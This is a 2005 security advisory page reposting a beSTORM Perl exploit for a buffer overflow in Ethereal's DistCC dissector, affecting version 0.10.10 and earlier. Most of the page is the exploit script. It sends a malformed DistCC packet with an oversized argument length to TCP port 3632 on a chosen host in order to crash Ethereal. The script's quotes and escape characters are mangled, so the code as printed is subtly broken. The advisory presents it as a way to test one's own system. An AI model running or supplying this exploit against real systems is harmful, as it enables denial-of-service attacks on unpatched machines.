‘Ethereal DistCC Buffer Overflow (Exploit)’

Published on May 10th, 2005
Summary

‘As we reported in our previous article: Ethereal DistCC Dissector Overflow, a vulnerability in Ethereal’s DistCC dissector allows attackers to cause Ethereal to crash by overflowing an internal buffer used by Ethereal when it tries to handle DistCC related packets. The following exploit code can be used to test your system for the mentioned vulnerability.’

Credit:

‘The information has been provided by beSTORM.’


Details

Vulnerable Systems:
 * Ethereal version 0.10.10 and prior

Immune Systems:
 * Ethereal version 0.10.11 or newer

Exploit:
#!/usr/bin/perl -w
# Exploit generated by beSTORM on 2005-05-10 12:45
# All Rights Reserved – Copyright ™

use IO::Socket;
use strict;

my $target = shift;
my $print_usage = 0;

if (!$target)
{
 usage();

 print ‘No target has been supplied, reverting to 192.168.1.52.n’;
 $target = ‘192.168.1.52’;
}

print ‘Will attack $target.n’;
my $target_port = 3632;

my $packet =<<END;
DIST00000001ARGC00000008ARGVFFFFFF00ccARGV00000002-gARGV00000003-O2ARGV00000005-WallARGV00000002-cARGV00000006main.cARGV00000002-oARGV00000006main.oDOTI0000001Bint main()n{n return(0);n}n
END

print ‘Sending: [$packet]n’;

my $remote = IO::Socket::INET->new ( Proto => ‘tcp’, PeerAddr => $target, PeerPort => ‘3632’);

unless ($remote) { die ‘cannot connect to distcc daemon on $target’ }

print $remote $packet;

print ‘Done.n’;

sub usage
{
 if ($print_usage) { return; }
 $print_usage = 1;
 print (‘#’x50);
 print ‘n’;
 print ‘# $0 [hostname]n’;
 print ‘# hostnamet-tThe host the packet will be sent to.n’;
 print ‘n’;
}’

Categories: Exploits
Tags:

Related Posts

Exploits Featured News

Cybercriminals Using WHO Alias For Phishing Campaign

Exploits Featured News

Coronavirus Outbreak Scam, Malware, Phishing Vulnerabilities

Exploits Featured

IBM Cognos Business Intelligence 10.2.2 Cross-Site Request Forgery (CSRF) Vulnerability